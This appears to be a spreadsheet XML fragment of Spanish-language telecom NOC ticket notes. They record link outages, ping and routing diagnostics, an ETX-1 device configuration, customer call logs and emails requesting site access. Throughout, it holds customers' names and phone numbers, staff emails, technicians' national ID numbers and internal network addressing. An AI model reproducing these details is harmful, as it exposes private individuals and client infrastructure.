DISPLAY IP ROUTING-TABLE VPN-INSTANCE INTERNET_GT_METRO 10.174.235.39
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : INTERNET_GT_METRO
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
  10.174.235.39/32  DIRECT  0    0                 0.0.0.0         VLANIF3740			</t>
  </si>
  <si>
    <t>F4591203</t>
  </si>
  <si>
    <t xml:space="preserve">
NO SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE CAÍDO SE VALIDARA RUTA DE ULTIMA MILLA .
PING HACIA ROUTER CPE:
PING -M 10 -Q -VPN WALLMART 10.72.85.84
  PING 10.72.85.84: 56  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.72.85.84 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS
RUTA IP:
PE: 10.179.28.56
DISPLAY IP ROUTING-TABLE VPN-INSTANCE WALLMART 10.72.85.84
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : WALLMART
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
    10.72.85.80/28  DIRECT  0    0             D   10.72.85.81     VLANIF1795			</t>
  </si>
  <si>
    <t>SE VALIDA EN EL SLOT 16 PTO 1 QUE NO HAY NIVELES DE F:O: SE PROCEDE A SOLICITAR CUN CONTACTO EN EL CLIENTE. PARA REALIZAR DESCARTES DE ENERGIA Y UNDICADORES LED DE EQUIPOS.
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3]
===============================================================================
THIS CHASSIS ID:[00]     CASCADED:[NO ]     MONITORED CHASSIS ID:[00]
SLOT #16 &gt; FRM220A-1000EAS/X        [LOCAL] VER:[1.300-1.044-0.000-0.000]
&lt;&lt;&lt; LOCAL FIBER 1 SFP AND D/D FUNCTION &gt;&gt;&gt;
VENDOR NAME          [CTC UNION       ]
VENDOR PART NUMBER   [SFS-7020-WA-DD  ]
FIBER TYPE           [SINGLE]
WAVE LENGTH          [1310 KM]
WAVE LENGTH 2        [1550 KM]
LINK LENGTH          [20 KM]
TX POWER             [-7 DBM]
RX POWER             [-40 DBM]
RX SENSITIVITY       [-23 DBM]
TEMPERATURE          [31 ¿ ]
&lt;ESC&gt;:GO TO PREVIOUS MENU.
     CTC UNION TECHNOLOGIES CO., LTD.      FRM220A-GSW/SNMP     VER.[1.063]
===============================================================================
THIS CHASSIS ID:[00]     CASCADED:[NO ]     MONITORED CHASSIS ID:[00]
SLOT #16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3]
===============================================================================
THIS CHASSIS ID:[00]     CASCADED:[NO ]     MONITORED CHASSIS ID:[00]
SLOT #16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16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F4591276</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE NELSON TREJOS AL 88675716  INDICA QUE AUN ESTA CAIDO EL SERVICIO || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
-ID1001468738
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  NELSON TREJOS 88675716 MENCIONA QUE YA TODO ESTA FUNCIONANDO BIEN ADICIONAL INDICA QUE SE CIERRE EL TICKET
-ID 1001472454</t>
  </si>
  <si>
    <t>F4591281</t>
  </si>
  <si>
    <t>**SE REENVIA CORREO A CLIENTE AL CORREO CORRECTO **
DE: VERONICA RAQUEL VASQUEZ CORTEZ &lt;VERONICAR.VASQUEZ@CLARO.COM.GT&gt;
ENVIADO: LUNES, 6 DE JUNIO DE 2022 12:38
PARA: CMMARTINEZL@BACCREDOMATIC.GT &lt;CMMARTINEZL@BACCREDOMATIC.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RV: BAC - 17400263T - AGENCIA 306</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS MARTINEZ 41289071 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE LUEGO DE LAS PRUEBAS QUE SE REALIZARON CON PR
-ID 1001602970 - 1001603150
&lt;EESCGTESN1T1A03B02EIM3&gt;PING -C 1000 -S 1500 -M 30 -B -VPN-INSTANCE CREDOMATIC 10.72.176.59
  PING 10.72.176.59: 1500  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.72.176.59 PING STATISTICS ---
    1000 PACKET(S) TRANSMITTED
    1000 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 3/3/10 MS
&lt;EESCGTESN1T1A03B02EIM3&gt;</t>
  </si>
  <si>
    <t>SE LE SOLICITA VALIDAR EL ROUTER Y EL ETX-1 AL CLIENTE SR. CARLOS MARTINEZ 41289071 SOLICITA LLAMAR EN 30 MINS YA QUE CONSEGUIRA EL NUMERO DE TELEFONO DEL PUNTO REMOTO.</t>
  </si>
  <si>
    <t>*** SE ENVÍAN DATOS DE PERSONAL A CLIENTE, A LA ESPERA DE CONFIRMACIÓN DE ACCESOS ***
DE: ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;
ENVIADO: LUNES, 6 DE JUNIO DE 2022 12:22
PARA: CNMARTINEZL@BACCREDOMATIC.GT &lt;CNMARTINEZL@BACCREDOMATIC.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: BAC - 17400263T - AGENCIA 306
ESTIMADOS BUEN DÍA,
EN SEGUIMIENTO DE LA FALLA, SE HA GESTIONADO UNA VISITA TÉCNICA. POR LO QUE SE SOLICITA DE SU APOYO EN QUE SE PUEDA GESTIONAR Y AUTORIZAR LOS ACCESOS PARA EL PERSONAL DESCRITO, FAVOR DE SU APOYO EN CONFIRMARNOS:
AXEL DANILO ZARPEC SAZO 1624-52527-0501
CUALQUIER DUDA O COMENTARIO QUEDO A LA ORDEN,
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS MARTINEZ AL 41289071  INDICA QUE NO HA RECIBIO CORREO SE CONFIRMA EL CORREO Y ESTA MAL CORREO CORRECTO ES CMMARTINEZL@BACCREDOMATIC.GT || SE NOTIFICA A GESTOR **
ID 1001557723
**</t>
  </si>
  <si>
    <t>F4591295</t>
  </si>
  <si>
    <t>###SE PROCEDE A CIERRE DE TICKET CLIENTE JANPOL PASQUIER-RUDY GOMEZ VALIDA EN LLAMADA CON TECNICO##
1001545798
COLA: CNOC_WORK_ORDER
NOMBRE: DE: 58264421
NÚMERO: 58264421
DURACIÓN: 0:18:08
ESTADO: ACD - ASIGNADO A: VELDIN.PALENCIA
DETALLES: 58264421
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: VELDIN.PALENCIA
FECHA Y HORA LOCALES: 6/06/2022 12:08:57</t>
  </si>
  <si>
    <t>F4591300</t>
  </si>
  <si>
    <t>SE HABLA CON BYRON GOMEZ (CLIENTE) CONSULTA AVANCES, SE HABLA CON LUIS ALVARADO (TEC) INFORMA QUE ESTA INGRESANDO A LA FINCA DEL INGENIO, REALIZARÁ PRUEBAS DE CONEXION, ESTARÁ PENDIENTE DE LA COMUNICACION CON JONATHAN YA QUE ESTA PENDIENTE LE CONFIRME ALGUNOS DATOS -*
-*</t>
  </si>
  <si>
    <t>-* SE HABLA CON BYRON GOMEZ 59362053 (CLIENTE) INFORMA QUE AUN VE CAIDO EL SERVICIO SE VALIDA INCIDENTE DE MASIVA F4591369 YA CERRADO,  SE DEJA EN CONFERENCIA CON SAMUEL ESTRADA (GESTOR) PARA VERIFICACIONES Y/O PRUEBAS -*
-*</t>
  </si>
  <si>
    <t>F4591306</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. JOSE RODRIGUEZ 42189442 COMUNICA A SR EDWIN RAMIREZ, SE LE SOLICITA UBICAR LOS EQUIPOS DEL ENLACE PARA APLICAR REINICIO.
SE APLICO REINICIO AL PUERTO #4 DEL ETX-1:
CELDA_ENTRE_RIOS&gt;CONFIG&gt;PORT# SHOW SUMMARY
PORT           NUMBER         NAME            ADMIN    OPER      SPEED
-----------------------------------------------------------------------------
ETHERNET       1              ETH-1           UP       UP        100000000
ETHERNET       2              ETH-2           UP       DOWN      100000000
ETHERNET       3              HACIA_ALCATEL_ENUP       UP        100000000
ETHERNET       4              363900002T      UP       UP        1000000000
ETHERNET       5              381800002T      UP       UP        100000000
ETHERNET       6              ETH-6           UP       DOWN      100000000
ETHERNET       101            MNG-ETH         UP       DOWN      100000000
CELDA_ENTRE_RIOS&gt;CONFIG# INFOO
#                            ^
# CLI ERROR: COMMAND NOT RECOGNIZED
CELDA_ENTRE_RIOS&gt;CONFIG# INFO
    ECHO "SYSTEM CONFIGURATION"
#   SYSTEM CONFIGURATION
    SYSTEM
        NAME "CELDA_ENTRE_RIOS"
    EXIT
    ECHO "QOS - CONFIGURATION"
#   QOS - CONFIGURATION
    QOS
        ECHO "QUEUE BLOCK PROFILE CONFIGURATION"
#       QUEUE BLOCK PROFILE CONFIGURATION
        QUEUE-BLOCK-PROFILE "DEFAULTQUEUE1"
            QUEUE 0
                SCHEDULING STRICT
            EXIT
            QUEUE 1
                SCHEDULING STRICT
            EXIT
        EXIT
        COS-MAP-PROFILE "DSCP-PROFILE"
            MAP 0..7 TO-COS 7
            MAP 8..15 TO-COS 6
            MAP 16..23 TO-COS 5
            MAP 24 TO-COS 1
            MAP 25..31 TO-COS 4
            MAP 32 TO-COS 0
            MAP 33 TO-COS 3
            MAP 34 TO-COS 2
            MAP 35 TO-COS 3
            MAP 36 TO-COS 2
            MAP 37 TO-COS 3
            MAP 38 TO-COS 2
            MAP 39 TO-COS 3
            MAP 40 TO-COS 1
            MAP 41..45 TO-COS 2
            MAP 46 TO-COS 0
            MAP 47 TO-COS 2
            MAP 48 TO-COS 0
            MAP 49..55 TO-COS 1
            MAP 56..63 TO-COS 0
        EXIT
    EXIT
    ECHO "PORT CONFIGURATION"
#   PORT CONFIGURATION
    PORT
        ECHO "ETHERNET - PORT CONFIGURATION"
#       ETHERNET - PORT CONFIGURATION
        ETHERNET 1
            MAX-CAPABILITY 100-FULL-DUPLEX
        EXIT
        ETHERNET 3
            NAME "HACIA_ALCATEL_ENTRE_RIOS_1293"
            NO AUTO-NEGOTIATION
            SPEED-DUPLEX 100-FULL-DUPLEX
        EXIT
        ETHERNET 4
            NAME "363900002T"
        EXIT
        ETHERNET 5
            NAME "381800002T"
        EXIT
        ETHERNET 6
            NO AUTO-NEGOTIATION
            SPEED-DUPLEX 100-FULL-DUPLEX
        EXIT
        ECHO "SERVICE VIRTUAL INTERFACE- PORT CONFIGURATION"
#       SERVICE VIRTUAL INTERFACE- PORT CONFIGURATION
        SVI 1
            NAME "SVI 1"
            NO SHUTDOWN
        EXIT
    EXIT
    ECHO "BRIDGE CONFIGURATION"
#   BRIDGE CONFIGURATION
    BRIDGE 1
        ECHO "BRIDGE PORT CONFIGURATION"
#       BRIDGE PORT CONFIGURATION
        PORT 1
            INGRESS-FILTERING
            QUEUE-MAPPING "DSCP-PROFILE"
        EXIT
        PORT 2
            INGRESS-FILTERING
            QUEUE-MAPPING "DSCP-PROFILE"
        EXIT
        PORT 3
            INGRESS-FILTERING
            PVID 1142 PRIORITY 0
            QUEUE-MAPPING "DSCP-PROFILE"
        EXIT
        PORT 4
            NAME "363900002"
            INGRESS-FILTERING
            PVID 1142 PRIORITY 0
            QUEUE-MAPPING "DSCP-PROFILE"
        EXIT
        PORT 5
            NAME "381800002"
            INGRESS-FILTERING
            PVID 1142 PRIORITY 0
            QUEUE-MAPPING "DSCP-PROFILE"
        EXIT
        PORT 6
            INGRESS-FILTERING
            PVID 1666 PRIORITY 0
            QUEUE-MAPPING "DSCP-PROFILE"
        EXIT
        ECHO "VLAN CONFIGURATION"
#       VLAN CONFIGURATION
        VLAN 115
            NAME "VLAN-115"
            TAGGED-EGRESS 1..3
        EXIT
        VLAN 1142
            NAME "EX&amp;GEN"
            TAGGED-EGRESS 1,3,5
            UNTAGGED-EGRESS 4
        EXIT
        VLAN 1666
            NAME "2G"
            TAGGED-EGRESS 3
            UNTAGGED-EGRESS 6
        EXIT
    EXIT
    ECHO "FLOWS CONFIGURATION"
#   FLOWS CONFIGURATION
    FLOWS
        ECHO "CLASSIFIER PROFILE CONFIGURATION"
#       CLASSIFIER PROFILE CONFIGURATION
        CLASSIFIER-PROFILE "115" MATCH-ANY
            MATCH VLAN 115
        EXIT
        CLASSIFIER-PROFILE "ALL" MATCH-ANY
            MATCH ALL
        EXIT
        ECHO "FLOW CONFIGURATION"
#       FLOW CONFIGURATION
        FLOW "MNG_IN"
            CLASSIFIER "115"
            VLAN-TAG POP VLAN
            INGRESS-PORT ETHERNET 3
            EGRESS-PORT SVI 1 QUEUE 1
            NO SHUTDOWN
        EXIT
        FLOW "MNG_OUT"
            CLASSIFIER "ALL"
            VLAN-TAG PUSH VLAN 115 P-BIT FIXED 7
            INGRESS-PORT SVI 1
            EGRESS-PORT ETHERNET 3 QUEUE 1 BLOCK 0/1
            NO SHUTDOWN
        EXIT
    EXIT
    ROUTER 1
        NAME "ROUTER#1"
        INTERFACE 1
            ADDRESS 10.87.165.54/26
            BIND SVI 1
            DHCP-CLIENT
                CLIENT-ID MAC
            EXIT
            NO SHUTDOWN
        EXIT
        STATIC-ROUTE 0.0.0.0/0 ADDRESS 10.87.165.1 METRIC 1
    EXIT</t>
  </si>
  <si>
    <t>SE VALIDA COLA DE CORREO Y SE OBSERVA RESPUESTA POR PARTE DE CLIENTE, INDICANDO QUE YA SE TIENEN LOS PERMISOS DE INGRESO
DE: EDWING OSWALDO BATZ MARTINEZ &lt;EBATZ@AGROCARIBE.COM&gt;
ENVIADO: LUNES, 6 DE JUNIO DE 2022 11:58
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;; EBATZ@AGROCARIBE.COM.GT &lt;EBATZ@AGROCARIBE.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; AGROCARIBE IT SOPORTE &lt;SOPORTEIT@AGROCARIBE.COM&gt;
ASUNTO: RE: SOLICITUD DE PERMISOS | 363900002T | EXTRACTORA LA FRANCIA S.A.
YA ESTÁ GESTIONADO EL PERMISO PARA EL INGRESO A LAS INSTALACIONES PARA EL SR. EDWIN ARAGÓN.
SALUDOS.</t>
  </si>
  <si>
    <t>SE ENVÍA CORREO A CLIENTE SOLCIITANDO LOS PERMISOS DE INGRESO PARA EL PERSONAL TÉCNICO QUE SE PRESETARA EN EL SITIO // QUEDAMOS A LA ESPERA DE LA RESPUESTA POR PARTE DE CLIENTE
DE: DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;
ENVIADO: LUNES, 6 DE JUNIO DE 2022 11:15
PARA: EBATZ@AGROCARIBE.COM.GT &lt;EBATZ@AGROCARIBE.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE PERMISOS | 363900002T | EXTRACTORA LA FRANCIA S.A.
BUEN DÍA ESTIMADO CLIENTE, UN GUSTO SALUDARLE.
CON RESPECTO AL SERVICIO REPORTADO, SOLICITAMOS DE SU APOYO GESTIONANDO LOS PERMISOS DE INGRESO PARA EL PERSONAL TÉCNICO QUE SE PRESENTARA EN SITIO, ASÍ MISMO SOLICITAMOS DE SU APOYO GESTIONANDO EL INGRESO A LA FINCA.
DIRECCIÓN: 276 RIO DULCE LIVINGSTONE IZABAL 15 34 55.06 N 88 33 36.95 W
ADJUNTAMOS LOS DATOS DEL TÉCNICO
 EDWIN ARAGON   IBM 510047    DPI 2061 82503 180
QUEDAMOS ATENTO A SUS COMENTARIOS
SALUDOS CORDIALES.
ATT:</t>
  </si>
  <si>
    <t>F4591319</t>
  </si>
  <si>
    <t>-* SE TIENE CORREO DE CLIENTE INDICANDO QUE LAS CONEXIONES ESTAN OK, SE SOLICITA APOYO A CNOC -*
RE: INC23535672 | COCA COLA FEMSA-COSTA RICA-LIMON-DISTRIBUIDORA | REVISION ENLACE CONTR0001396492OC
-*</t>
  </si>
  <si>
    <t>F4591323</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE YENI,  PARA VALIAR PRUEBAS DE PRIMER NIVEL, INDICA QUE YA SE APLICO REINICIO A LOS EQUIPOS PERO SERVICIO CONTINUA CAIDO Y PROPORCIONA LOS SIGUIENTES DATOS:
CONTACTO EN SITIO: YENI COCA 95344688
PERMISOS: NO
HORARIO: 8:00 A 16:00 HORAS
DIRECCION: OFIC. COLPROSUMAH, POR LA SECRETARIA DEPARTAMENTAL DE EDUC. ,COLONIA YESSENIA CASTILLO , SECTOR DE DANTILLO, EN LA CEIBA
NÚMERO: 0050495344688
FIN: HOY, 08:35
ID DE LLAMADA: 1001477021</t>
  </si>
  <si>
    <t>F4591329</t>
  </si>
  <si>
    <t>SE HABLA CON EL CLIENTE JARID HERNANDEZ QUIEN VALIDA EL SERVICIO.  SE PROCEDE AL CIERRE DEL CASO.
1001729297
COLA:
NOMBRE: A: 0050370692921
NÚMERO: 0050370692921
DURACIÓN: 0:00:27
ESTADO: CONECTADA
DETALLES: 0050370692921
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 7/06/2022 10:16:02</t>
  </si>
  <si>
    <t>F4591330</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DANICA DE LEON AL 50186215 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 1001499319
**</t>
  </si>
  <si>
    <t>F4591332</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DANICA DE LEON 50186215  MENCIONA QUE TODO ESTA FUNCIONANDO BIEN PERO SOLICITA LLAMADA PARA LAS 11 VALIDAR EL FUNCIONAMIENTO
-ID 1001494803</t>
  </si>
  <si>
    <t>F4591337</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE MIGUEL GIL 77866494 PERO NO CONTESTA, SE INTENTARA EN UNOS INSTANTES
1001738576
COLA:
NOMBRE: A: 0050377866494
NÚMERO: 0050377866494
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DURACIÓN: 0:00:14
DETALLES: 0050377866494
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSEGODINEZ
FECHA Y HORA LOCALES: 7/06/2022 10:40:11
1001738728
COLA:
NOMBRE: A: 0050377866494
NÚMERO: 0050377866494
ESTADO: MARCANDO
DURACIÓN: 0:00:22
DETALLES: 0050377866494
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSEGODINEZ
FECHA Y HORA LOCALES: 7/06/2022 10:40:18</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MIGUEL GIL 77866494 SIGUE SIN RESPONDE || SE INTENTARA LUEGO **
ID 1001575940
**</t>
  </si>
  <si>
    <t>****SE LLAMA A CLIENTE MIGUEL GIL 77866494 SIGUE SIN RESPONDE || ENVIA A BUZON ||
SE INTENTARA LUEGO **
ID 1001594317
**</t>
  </si>
  <si>
    <t>**SE LLAMA AL CLIENTE MIGUEL GIL 77866494 NO RESPONDE || SE INTENTARA LUEGO **
ID 1001512214
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  MIGUEL GIL AL 77866494  NO RESPONDE || SE INTENTARA LUEGO **
ID 1001534342
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MIGUEL GIL  AL 77866494  INDICA QUE NO ESTA EN OFICINA Y SOLICITA QUE SE LE LLAME MAÑANA A LAS 9:00 AM **
ID 1001616912
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MIGUEL GIL 77866494 MENCIONA QUE ESTE SERVICIO YA ESTA FUNCIONANDO BIEN PERO TIENE PROBLEMA CON EL GDN 22438250
SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 1001782807</t>
  </si>
  <si>
    <t>F4591338</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL PR 77560412 CONTESTA EL SEÑOR JOSE LETONA CONFIRMA QUE ERA PROBLEMA DE ENERGIA QUE NO HABIA PERO QUE YA ESTA ESTABLE Y OPERATIVO EL SERVICIO **
ID 1001491976
**</t>
  </si>
  <si>
    <t>F4591349</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA LA GESTION DE LOS PERMISOS
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: LUNES, 6 DE JUNIO DE 2022 12:49
PARA: CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;; ENIS GABRIEL CRUZ RODRIGUEZ &lt;ENISCRUZ@COOPERATIVACEIBENA.HN&gt;; PEREZ ZAPATA, DUNIA YAHAYRA &lt;DUNIA.PEREZ@CLARO.COM.HN&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; SOPORTE N1 CNOC &lt;SOPORTEN1.CNOC@CLARO.COM.GT&gt;; NIVEL 2 VIP &lt;NIVEL2.VIP@CLARO.COM.HN&gt;; NOC &lt;NOC@CLARO.COM.HN&gt;
ASUNTO: RE: VENTANILLA MERCADO SAN ISIDRO
BUENA TARDE
SOLICITAMOS PUEDA GESTIONARSE EL ACCESO A PERSONAL TÉCNICO DE CLARO PARA EL INGRESO A SUS INSTALACIONES PARA REALIZAR LAS REPARACIONES NECESARIAS.
FAVIO SANTOS             1807-1993-00740
OMAR GUARDADO     0413-1984-00606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91350</t>
  </si>
  <si>
    <t>INFORMA CLIENTE CARMEN ZELADA 78323726 QUE ENCONTRÓ SU UPS APAGADO, LO ENCENDIERON Y EL SERVICIO RESTABLECIÓ. VALIDA EL E1 OPERATIVO. AUTORIZA EL CIERRE DEL CASO. ID DE LLAMADA: 1001482610</t>
  </si>
  <si>
    <t>F4591351</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JESI HERNANDEZ 33040036 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001491151</t>
  </si>
  <si>
    <t>F4591359</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 23386801 RESPONDE JUAN CARLOS MENCIONA QUE SE TIENE QUE GESTIONAR CON LA CENTRAL LOS PERMISOS, NO CUENTA CON EL CORREO DE LA CENTRAL
-ID 2001180961</t>
  </si>
  <si>
    <t>ASUNTO:  7800307T || BANCO G&amp;T || GT
NO SE OBSERVA RESPUESTA POR PARTE DEL CLIENTE</t>
  </si>
  <si>
    <t>###SE REVISA COLA DE CORREOS SIN RESPUESTA POR PARTE DEL CLIENTE###
 ASUNTO:      7800307T || BANCO G&amp;T || GT</t>
  </si>
  <si>
    <t>SE HABLA CON JUAN CARLOS, NO SE TIENEN EVENTOS DE ENERGIA O MANTENIMIENTO, NO APOYA REALIZANDO PRUEBAS, SE PROCEDERA A COORDINAR VISITA DEBIDO A REINCIDENCIA EN EL MONITOREO, VERIFICAR  LAS CONEXIONES ENTRE EQUIPO ASMI Y CPE,  ADICIONAL SE DEBE VALIDAR QUE LOS EQUIPOS CUENTEN CON CONDICIONES MINIMAS AL TENER AL PERSONAL TECNICO EN AGENCIA FAVOR LUEGO DE LAS VALIDACIONES FISICAS ENTRE EQUIPOS (POSIBLMENTE EL CABLE QUE INTERCONECTA EL ASMI Y CPE ) ESTE DAÑADO,  FAVOR  REVISAR QUE A NIVEL DE PING EL SERVICIO YA NO PRESENTE  PERDIDAS ENLACE  A GENERADO REINCIDENCIA EN LOS ULTIMOS DIAS.
ID
1001858781
COLA:
NOMBRE: A: 23386801
NÚMERO: 22282801
DURACIÓN: 0:01:51
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 22282801
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 7/06/2022 16:54:46</t>
  </si>
  <si>
    <t>F4591363</t>
  </si>
  <si>
    <t xml:space="preserve">
SE ENVIA CORREO A CLIENTE, SE QUEDA A ESPERA DE RESPUESTA.
DE: LUVY ESAU SANDOVAL MATEO &lt;LUVY.SANDOVAL@CLARO.COM.GT&gt;
ENVIADO: LUNES, 6 DE JUNIO DE 2022 9:34
PARA: JENNY.RAMOS@ABANK.COM.SV &lt;JENNY.RAMOS@ABANK.COM.SV&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: IP2024147 | BANCO AZTECA EL SALVADOR S.A. | SD1130859
BUENOS DÍAS, ESTIMADO CLIENTE.
COMO PARTE DEL SEGUIMIENTO AL CASO, SE OBSERVA DE NUESTRA PARTE ENLACE OPERATIVO, LLEGANDO SIN PÉRDIDA DE PAQUETES A LA IP WAN DE PUNTO REMOTO, CON UNA RÁFAGA DE 1500 PAQUETES CON PESO MÁXIMO DE 1500 BYTES, OBTENIENDO RESULTADOS DE  MÍNIMO /PROMEDIO /MÁXIMO = 2/3/50 MS RESPECTIVAMENTE.
SE VALIDA 5MBPS CONFIGURADOS
EN ARP, SE VALIDA UN EQUIPO ASOCIADO CON IP 10.45.164.10  Y MAC  84B5.9C5D.1486
SE DESCARTA SATURACIÓN, DEBIDO A QUE NO LLEGA A LOS 5MPBS EN TRÁFICO
QUEDAREMOS ATENTOS A SUS COMENTARIOS, YA QUE SE SUGIERE DESCARTAR INCONVENIENTE CON EQUIPOS INTERNOS O REALIZAR UNA PRUEBA  DE VELOCIDAD CONCTANDO UN EQUIPO DIRECTAMENTE AL ROUTER DE CLARO PARA DETERMINAR QUE SE ESTÉ OBTENIENDO LA VELOCIDAD CONTRATADA DE 5MBPS.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>F4591364</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CINTYA 78625021 MENCIONA QUE PERSISTE EL INCONVENIENTE, SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 1001507894</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CINTYA AL 78625021 INDICA QUE TECNICO AUN SE ENCUENTRA REALIZANDO PRUEBAS SOLICITA QUE SE LE LLAME LUEGO**
ID 1001624745
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  CINTYA AL 78625021 INDICA QUE YA VA ELLA PARA ADUANA A SOLICITAR EL ACCESO PARA LOS TECNICOS**
ID 1001584408
**</t>
  </si>
  <si>
    <t>F4591372</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE IRIS MARTINEZ-41380208   APLICA RESET A PBX Y A MODEM ##SERVICIO NO RESTABLECE##
1001487334
COLA:
